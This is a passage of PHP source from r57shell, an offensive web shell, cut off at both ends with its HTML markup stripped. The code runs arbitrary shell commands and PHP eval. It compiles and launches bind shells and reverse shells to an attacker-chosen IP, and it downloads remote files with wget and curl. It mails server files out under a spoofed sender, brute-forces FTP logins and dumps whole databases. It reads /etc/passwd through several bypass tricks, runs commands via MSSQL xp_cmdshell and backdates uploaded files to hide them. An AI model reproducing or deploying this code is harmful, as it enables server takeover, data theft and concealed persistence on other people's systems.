";if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail"){$res=mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");mr($language,$res);$_POST['cmd']="";}if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])){if(!$file=@fopen($_POST['loc_file'],"r")){echo re($_POST['loc_file']);$_POST['cmd']="";}else {$filename=@basename($_POST['loc_file']);$filedump=@fread($file,@filesize($_POST['loc_file']));fclose($file);$content_encoding=$mime_type='';compress($filename,$filedump,$_POST['compress']);$attach=array("name"=>$filename,"type"=>$mime_type,"content"=>$filedump);if(empty($_POST['subj'])){$_POST['subj']='file from r57shell';}if(empty($_POST['from'])){$_POST['from']='billy@microsoft.com';}$res=mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);mr($language,$res);$_POST['cmd']="";}}if(!empty($_POST['cmd']) && $_POST['cmd']=="find_text"){$_POST['cmd']='find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';}if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_"){switch($_POST['what']){case 'own':@chown($_POST['param1'],$_POST['param2']);break;case 'grp':@chgrp($_POST['param1'],$_POST['param2']);break;case 'mod':@chmod($_POST['param1'],intval($_POST['param2'],8 ));break;}$_POST['cmd']="";}if(!empty($_POST['cmd']) && $_POST['cmd']=="mk"){switch($_POST['what']){case 'file':if($_POST['action']=="create"){if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")){echo ce($_POST['mk_name']);$_POST['cmd']="";}else {fclose($file);$_POST['e_name']=$_POST['mk_name'];$_POST['cmd']="edit_file";echo "
".$lang[$language.'_text61']."
";}}else if($_POST['action']=="delete"){if(unlink($_POST['mk_name']))echo "
".$lang[$language.'_text63']."
";$_POST['cmd']="";}break;case 'dir':if($_POST['action']=="create"){if(mkdir($_POST['mk_name'])){$_POST['cmd']="";echo "
".$lang[$language.'_text62']."
";}else {echo ce($_POST['mk_name']);$_POST['cmd']="";}}else if($_POST['action']=="delete"){if(rmdir($_POST['mk_name']))echo "
".$lang[$language.'_text64']."
";$_POST['cmd']="";}break;}}if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])){if(!$file=@fopen($_POST['e_name'],"r+")){$only_read=1 ;@fclose($file);}if(!$file=@fopen($_POST['e_name'],"r")){echo re($_POST['e_name']);$_POST['cmd']="";}else {echo $table_up3;echo $font;echo "
";echo ws(3 )."".$_POST['e_name']."";echo "
";echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));fclose($file);echo "";echo "";echo "";echo "";echo (!empty($only_read)?("

".$lang[$language.'_text44']):("

"));echo "
";echo "";echo "
";echo "";exit();}}if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file"){if(!$file=@fopen($_POST['e_name'],"w")){echo we($_POST['e_name']);}else {@fwrite($file,$_POST['e_text']);@fclose($file);$_POST['cmd']="";echo "
".$lang[$language.'_text45']."
";}}if(!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use']=="C")){cf("/tmp/bd.c",$port_bind_bd_c);$blah=ex("gcc -o /tmp/bd /tmp/bd.c");@unlink("/tmp/bd.c");$blah=ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");$_POST['cmd']="ps -aux | grep bd";}if(!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use']=="Perl")){cf("/tmp/bdpl",$port_bind_bd_pl);$p2=which("perl");if(empty($p2))$p2="perl";$blah=ex($p2." /tmp/bdpl ".$_POST['port']." &");$_POST['cmd']="ps -aux | grep bdpl";}if(!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")){cf("/tmp/back",$back_connect);$p2=which("perl");if(empty($p2))$p2="perl";$blah=ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";}if(!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")){cf("/tmp/back.c",$back_connect_c);$blah=ex("gcc -o /tmp/backc /tmp/back.c");@unlink("/tmp/back.c");$blah=ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";}if(!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")){cf("/tmp/dp",$datapipe_pl);$p2=which("perl");if(empty($p2))$p2="perl";$blah=ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");$_POST['cmd']="ps -aux | grep dp";}if(!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")){cf("/tmp/dpc.c",$datapipe_c);$blah=ex("gcc -o /tmp/dpc /tmp/dpc.c");@unlink("/tmp/dpc.c");$blah=ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");$_POST['cmd']="ps -aux | grep dpc";}if(!empty($_POST['alias'])){foreach($aliases as $alias_name=>$alias_cmd){if($_POST['alias']==$alias_name){$_POST['cmd']=$alias_cmd;}}}if(!empty($_FILES['userfile']['name'])){if(isset($_POST['nf1']) && !empty($_POST['new_name'])){$nfn=$_POST['new_name'];}else {$nfn=$_FILES['userfile']['name'];}if(!@copy($_FILES['userfile']['tmp_name'],$_POST['dir']."/".$nfn)){print ("
Error uploading file ".$_FILES['userfile']['name']."
");}else {if(is_file('index.php')){$timeOthFile=filemtime('index.php');touch($_POST['dir']."/".$nfn,$timeOthFile,$timeOthFile);}}}if(!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])){switch($_POST['with']){case wget:$_POST['cmd']=which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";break;case fetch:$_POST['cmd']=which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";break;case lynx:$_POST['cmd']=which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";break;case links:$_POST['cmd']=which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";break;case GET:$_POST['cmd']=which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";break;case curl:$_POST['cmd']=which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";break;}}if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")){list($ftp_server,$ftp_port)=split(":",$_POST['ftp_server_port']);if(empty($ftp_port)){$ftp_port=21 ;}$connection=@ftp_connect($ftp_server,$ftp_port,10 );if(!$connection){fe($language,0 );}else {if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])){fe($language,1 );}else {if($_POST['cmd']=="ftp_file_down"){if(chop($_POST['loc_file'])==$dir){$_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']);}@ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}if($_POST['cmd']=="ftp_file_up"){@ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}}}@ftp_close($connection);$_POST['cmd']="";}if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute"){list($ftp_server,$ftp_port)=split(":",$_POST['ftp_server_port']);if(empty($ftp_port)){$ftp_port=21 ;}$connection=@ftp_connect($ftp_server,$ftp_port,10 );if(!$connection){fe($language,0 );$_POST['cmd']="";}else if(!$users=shell_get_users()){echo "
".$lang[$language.'_text96']."
";$_POST['cmd']="";}@ftp_close($connection);}echo $table_up3;if(empty($_POST['cmd']) && !$safe_mode){$_POST['cmd']=($windows)?("dir"):("ls -lia");}else if(empty($_POST['cmd']) && $safe_mode){$_POST['cmd']="safe_dir";}echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."";if(!$safe_mode || $_POST['cmd']!="safe_dir"){echo "";}if($safe_mode){switch($_POST['cmd']){case 'safe_dir':$d=@dir($dir);if($d){$arrDirs=array();$arrFiles=array();$arrCnt=0 ;while(false!==($file=$d->read())){if($file==".")continue;@clearstatcache();list($dev,$inode,$inodep,$nlink,$uid,$gid,$inodev,$size,$atime,$mtime,$ctime,$bsize)=stat($file);if($windows){if(@is_dir($file)){$arrDirs[$file]['type']="dir";$arrDirs[$file]['permis']="";$arrDirs[$file]['date']=date("d.m.Y H:i",$mtime);$arrDirs[$file]['size']=" <DIR>";$arrDirs[$file]['name']=$file;}else {$arrFiles[$file]['type']="file";$arrFiles[$file]['permis']="";$arrFiles[$file]['date']=date("d.m.Y H:i",$mtime);$arrFiles[$file]['size']=sprintf("%7s",$size);$arrFiles[$file]['name']=$file;}}else {if(@is_dir($file)){$arrDirs[$file]['type']="dir";$arrDirs[$file]['permis']=perms(@fileperms($file));$arrDirs[$file]['date']=date("d.m.Y H:i",$mtime);$arrDirs[$file]['size']=sprintf("%9s %7s",$uid."/".$gid,$size);$arrDirs[$file]['name']=$file;}else {$arrFiles[$file]['type']="file";$arrFiles[$file]['permis']=perms(@fileperms($file));$arrFiles[$file]['date']=date("d.m.Y H:i",$mtime);$arrFiles[$file]['size']=sprintf("%9s %7s",$uid."/".$gid,$size);$arrFiles[$file]['name']=$file;}}$arrCnt++;}$d->close();ksort($arrDirs);ksort($arrFiles);$arrDirsAndFiles=array_merge($arrDirs,$arrFiles);}else {echo $lang[$language._text29];}break;case 'safe_file':if(@is_file($_POST['file'])){$file=@file($_POST['file']);if($file){$c=@sizeof($file);for($i=0 ;$i<$c;$i++){echo htmlspecialchars($file[$i]);}}else {echo $lang[$language._text29];}}else {echo $lang[$language._text31];}break;case 'test1':$ci=@curl_init("file://".$_POST['test1_file']."");$cf=@curl_exec($ci);echo $cf;break;case 'test2':@include ($_POST['test2_file']);break;case 'test3':if(!isset($_POST['test3_port']) || empty($_POST['test3_port'])){$_POST['test3_port']="3306";}$db=@mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);if($db){if(@mysql_select_db($_POST['test3_md'],$db)){$sql="DROP TABLE IF EXISTS temp_r57_table;";@mysql_query($sql);$sql="CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";@mysql_query($sql);$sql="LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";@mysql_query($sql);$sql="SELECT * FROM temp_r57_table;";$r=@mysql_query($sql);while(($r_sql=@mysql_fetch_array($r))){echo @htmlspecialchars($r_sql[0 ]);}$sql="DROP TABLE IF EXISTS temp_r57_table;";@mysql_query($sql);}else echo "[-] ERROR! Can't select database";@mysql_close($db);}else echo "[-] ERROR! Can't connect to mysql server";break;case 'test4':if(!isset($_POST['test4_port']) || empty($_POST['test4_port'])){$_POST['test4_port']="1433";}$db=@mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);if($db){if(@mssql_select_db($_POST['test4_md'],$db)){@mssql_query("drop table r57_temp_table",$db);@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);$res=mssql_query("select * from r57_temp_table",$db);while(($row=@mssql_fetch_row($res))){echo $row[0 ]."\r\n";}@mssql_query("drop table r57_temp_table",$db);}else echo "[-] ERROR! Can't select database";@mssql_close($db);}else echo "[-] ERROR! Can't connect to MSSQL server";break;}}else if(($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_show") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute")){$cmd_rep=ex($_POST['cmd']);if($windows){echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n";}else {echo @htmlspecialchars($cmd_rep)."\n";}}if($_POST['cmd']=="ftp_brute"){$suc=0 ;foreach($users as $user){$connection=@ftp_connect($ftp_server,$ftp_port,10 );if(@ftp_login($connection,$user,$user)){echo "[+] $user:$user - success\r\n";$suc++;}else if(isset($_POST['reverse'])){if(@ftp_login($connection,$user,strrev($user))){echo "[+] $user:".strrev($user)." - success\r\n";$suc++;}}@ftp_close($connection);}echo "\r\n-------------------------------------\r\n";$count=count($users);if(isset($_POST['reverse'])){$count*=2 ;}echo $lang[$language.'_text97'].$count."\r\n";echo $lang[$language.'_text98'].$suc."\r\n";}if($_POST['cmd']=="php_eval"){$eval=@str_replace("<?","",$_POST['php_eval']);$eval=@str_replace("?>","",$eval);eval($eval);}if($_POST['cmd']=="db_show"){switch($_POST['db']){case 'MySQL':if(empty($_POST['db_port'])){$_POST['db_port']='3306';}$db=@mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);if($db){$res=@mysql_query("SHOW DATABASES",$db);while(($row=@mysql_fetch_row($res))){echo "[+] ".$row[0 ]."\r\n";if(isset($_POST['st'])){$res2=@mysql_query("SHOW TABLES FROM ".$row[0 ],$db);while(($row2=@mysql_fetch_row($res2))){echo " | - ".$row2[0 ]."\r\n";if(isset($_POST['sc'])){$res3=@mysql_query("SHOW COLUMNS FROM ".$row[0 ].".".$row2[0 ],$db);while(($row3=@mysql_fetch_row($res3))){echo " | - ".$row3[0 ]."\r\n";}}}}}@mysql_close($db);}else echo "[-] ERROR! Can't connect to MySQL server";break;case 'MSSQL':if(empty($_POST['db_port'])){$_POST['db_port']='1433';}$db=@mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);if($db){$res=@mssql_query("sp_databases",$db);while(($row=@mssql_fetch_row($res))){echo "[+] ".$row[0 ]."\r\n";if(isset($_POST['st'])){@mssql_select_db($row[0 ]);$res2=@mssql_query("sp_tables",$db);while(($row2=@mssql_fetch_array($res2))){if($row2['TABLE_TYPE']=='TABLE' && $row2['TABLE_NAME']!='dtproperties'){echo " | - ".$row2['TABLE_NAME']."\r\n";if(isset($_POST['sc'])){$res3=@mssql_query("sp_columns ".$row2[2 ],$db);while(($row3=@mssql_fetch_array($res3))){echo " | - ".$row3['COLUMN_NAME']."\r\n";}}}}}}@mssql_close($db);}else echo "[-] ERROR! Can't connect to MSSQL server";break;case 'PostgreSQL':if(empty($_POST['db_port'])){$_POST['db_port']='5432';}$str="host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";$db=@pg_connect($str);if($db){$res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");while(($row=@pg_fetch_row($res))){echo "[+] ".$row[0 ]."\r\n";}@pg_close($db);}else echo "[-] ERROR! Can't connect to PostgreSQL server";break;}}if($_POST['cmd']=="mysql_dump"){if(isset($_POST['dif'])){$fp=@fopen($_POST['dif_name'],"w");}if((!empty($_POST['dif']) && $fp) || (empty($_POST['dif']))){$sqh="# homepage: http://rst.void.ru\r\n";$sqh.="# ---------------------------------\r\n";$sqh.="# date : ".date("j F Y g:i")."\r\n";$sqh.="# database : ".$_POST['mysql_db']."\r\n";$sqh.="# table : ".$_POST['mysql_tbl']."\r\n";$sqh.="# ---------------------------------\r\n\r\n";switch($_POST['db']){case 'MySQL':if(empty($_POST['db_port'])){$_POST['db_port']='3306';}$db=@mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);if($db){if(@mysql_select_db($_POST['mysql_db'],$db)){$sql1="# MySQL dump created by r57shell\r\n";$sql1.=$sqh;$res=@mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`",$db);$row=@mysql_fetch_row($res);$sql1.=$row[1 ]."\r\n\r\n";$sql1.="# ---------------------------------\r\n\r\n";$sql2='';$res=@mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`",$db);if(@mysql_num_rows($res)>0 ){while(($row=@mysql_fetch_assoc($res))){$keys=@implode("`, `",@array_keys($row));$values=@array_values($row);foreach($values as $k=>$v){$values[$k]=addslashes($v);}$values=@implode("', '",$values);$sql2.="INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";}$sql2.="\r\n# ---------------------------------";}if(!empty($_POST['dif']) && $fp){@fputs($fp,$sql1.$sql2);}else {echo $sql1.$sql2;}}else echo "[-] ERROR! Can't select database";@mysql_close($db);}else echo "[-] ERROR! Can't connect to MySQL server";break;case 'MSSQL':if(empty($_POST['db_port'])){$_POST['db_port']='1433';}$db=@mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);if($db){if(@mssql_select_db($_POST['mysql_db'],$db)){$sql1="# MSSQL dump created by r57shell\r\n";$sql1.=$sqh;$sql2='';$res=@mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."",$db);if(@mssql_num_rows($res)>0 ){while(($row=@mssql_fetch_assoc($res))){$keys=@implode(", ",@array_keys($row));$values=@array_values($row);foreach($values as $k=>$v){$values[$k]=addslashes($v);}$values=@implode("', '",$values);$sql2.="INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";}$sql2.="\r\n# ---------------------------------";}if(!empty($_POST['dif']) && $fp){@fputs($fp,$sql1.$sql2);}else {echo $sql1.$sql2;}}else echo "[-] ERROR! Can't select database";@mssql_close($db);}else echo "[-] ERROR! Can't connect to MSSQL server";break;case 'PostgreSQL':if(empty($_POST['db_port'])){$_POST['db_port']='5432';}$str="host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";$db=@pg_connect($str);if($db){$sql1="# PostgreSQL dump created by r57shell\r\n";$sql1.=$sqh;$sql2='';$res=@pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");if(@pg_num_rows($res)>0 ){while(($row=@pg_fetch_assoc($res))){$keys=@implode(", ",@array_keys($row));$values=@array_values($row);foreach($values as $k=>$v){$values[$k]=addslashes($v);}$values=@implode("', '",$values);$sql2.="INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";}$sql2.="\r\n# ---------------------------------";}if(!empty($_POST['dif']) && $fp){@fputs($fp,$sql1.$sql2);}else {echo $sql1.$sql2;}@pg_close($db);}else echo "[-] ERROR! Can't connect to PostgreSQL server";break;}}else if(!empty($_POST['dif']) && !$fp){echo "[-] ERROR! Can't write in dump file";}}if(!$safe_mode || $_POST['cmd']!="safe_dir"){echo "";}echo "
";echo "";echo "";if($safe_mode && $_POST['cmd']=="safe_dir" && isset($arrDirsAndFiles)){echo "";print "

";print "";print "";print "";print "";foreach($arrDirsAndFiles as $arrDirsAndFilesKey=>$arrDirsAndFilesVal){print "";if($arrDirsAndFilesVal['type']=="dir"){print "";}if($arrDirsAndFilesVal['type']=="file"){print "";}print "";print "";print "";print "";}print "
name size date permis
".$arrDirsAndFilesVal['name']." ".$arrDirsAndFilesVal['name']." ".str_replace(array("<",">"),array("<",">"),$arrDirsAndFilesVal['size'])." ".$arrDirsAndFilesVal['date']." ".$arrDirsAndFilesVal['permis']."
";echo "";}echo "";echo "";function up_down($id){global $lang;global $language;return "";}function div($id){if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0 )return '
';return '
';}if(!$safe_mode){echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;echo sr(15 ,"".$lang[$language.'_text3'].$arrow."",in('text','cmd',85 ,''));echo sr(15 ,"".$lang[$language.'_text4'].$arrow."",in('text','dir',85 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt1']));echo $te.'
'.$table_end1.$fe;}else {echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;echo sr(15 ,"".$lang[$language.'_text4'].$arrow."",in('text','dir',85 ,$dir).in('hidden','cmd',0 ,'safe_dir').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt6']));echo $te.'
'.$table_end1.$fe;}echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;echo sr(15 ,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85 ,$dir).in('hidden','cmd',0 ,'edit_file').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt11']));echo $te.''.$table_end1.$fe;if($safe_mode){echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;echo sr(15 ,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54 ,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4 )."".ws(3 )."".in('hidden','cmd',0 ,'mk').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt13']));echo $te.''.$table_end1.$fe;}if($safe_mode && $unix){echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;echo sr(15 ,"".$lang[$language.'_text68'].$arrow."","".ws(2 )."".$lang[$language.'_text69'].$arrow."".ws(2 ).in('text','param1',40 ,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2 )."".$lang[$language.'_text70'].$arrow."".ws(2 ).in('text','param2 title="'.$lang[$language.'_text71'].'"',26 ,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0 ,'ch_').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt1']));echo $te.''.$table_end1.$fe;}if(!$safe_mode){foreach($aliases as $alias_name=>$alias_cmd){$aliases2.="";}echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;echo sr(15 ,"".ws(9 ).$lang[$language.'_text8'].$arrow.ws(4 )."","".in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt1']));echo $te.''.$table_end1.$fe;}echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;echo sr(15 ,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85 ,'text').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt12']));echo sr(15 ,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85 ,$dir)." * ( /root;/home;/tmp )");echo sr(15 ,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0 ,'1').in('text','s_mask',82 ,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0 ,'search_text').in('hidden','dir',0 ,$dir));echo $te.''.$table_end1.$fe;if(!$safe_mode && $unix){echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;echo sr(15 ,"".$lang[$language.'_text72'].$arrow."",in('text','s_text',85 ,'text').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt12']));echo sr(15 ,"".$lang[$language.'_text73'].$arrow."",in('text','s_dir',85 ,$dir)." * ( /root;/home;/tmp )");echo sr(15 ,"".$lang[$language.'_text74'].$arrow."",in('text','s_mask',85 ,'*.[hc]').ws(1 ).$lang[$language.'_text75'].in('hidden','cmd',0 ,'find_text').in('hidden','dir',0 ,$dir));echo $te.''.$table_end1.$fe;}echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;echo "
".div('id9')."";echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));echo "";echo in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'php_eval');echo "
".ws(1 ).in('submit','submit',0 ,$lang[$language.'_butt1']);echo "
";echo $table_end1.$fe;if($safe_mode && $curl_on){echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;echo sr(15 ,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85 ,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'test1').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt8']));echo $te.''.$table_end1.$fe;}if($safe_mode){echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;echo "
";echo sr(15 ,"".$lang[$language.'_text30'].$arrow."",in('text','test2_file',85 ,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'test2').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt8']));echo $te.''.$table_end1.$fe;}if($safe_mode && $mysql_on){echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;echo sr(15 ,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15 ,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4 )."".$lang[$language.'_text37'].$arrow."".in('text','test3_ml',15 ,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4 )."".$lang[$language.'_text38'].$arrow."".in('text','test3_mp',15 ,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4 )."".$lang[$language.'_text14'].$arrow."".in('text','test3_port',15 ,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));echo sr(15 ,"".$lang[$language.'_text30'].$arrow."",in('text','test3_file',96 ,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'test3').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt8']));echo $te.''.$table_end1.$fe;}if($safe_mode && $mssql_on){echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;echo sr(15 ,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15 ,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4 )."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15 ,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4 )."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15 ,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4 )."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15 ,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));echo sr(15 ,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96 ,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'test4').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt8']));echo $te.''.$table_end1.$fe;}if(@ini_get('file_uploads')){echo "";echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;echo sr(15 ,"".$lang[$language.'_text6'].$arrow."",in('file','userfile',85 ,''));echo sr(15 ,"".$lang[$language.'_text21'].$arrow."",in('checkbox','nf1 id=nf1',0 ,'1').in('text','new_name',82 ,'').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt2']));echo $te.''.$table_end1.$fe;}if(!$safe_mode && !$windows){echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;echo sr(15 ,"".$lang[$language.'_text16'].$arrow."","".in('hidden','dir',0 ,$dir).ws(2 )."".$lang[$language.'_text17'].$arrow."".in('text','rem_file',78 ,'http://'));echo sr(15 ,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',105 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt2']));echo $te.''.$table_end1.$fe;}echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;echo sr(15 ,"".$lang[$language.'_text59'].$arrow."",in('text','d_name',85 ,$dir).in('hidden','cmd',0 ,'download_file').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt14']));$arh=$lang[$language.'_text92'];if(@function_exists('gzcompress')){$arh.=in('radio','compress',0 ,'zip').' zip';}if(@function_exists('gzencode')){$arh.=in('radio','compress',0 ,'gzip').' gzip';}if(@function_exists('bzcompress')){$arh.=in('radio','compress',0 ,'bzip').' bzip';}echo sr(15 ,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0 ,'none').' '.$arh);echo $te.''.$table_end1.$fe;print $fs.$table_up1."CMS info".$table_up2.'
';print in('hidden','cmd',0 ,'safe_dir').in('hidden','dir',0 ,$dir).in('hidden','cms_info',0 ,'1').in('submit','submit',0 ,"get site info from database (WordPress, Joomla, DLE, Drupal, Bitrix)");if(isset($_POST['cms_info'])){print '
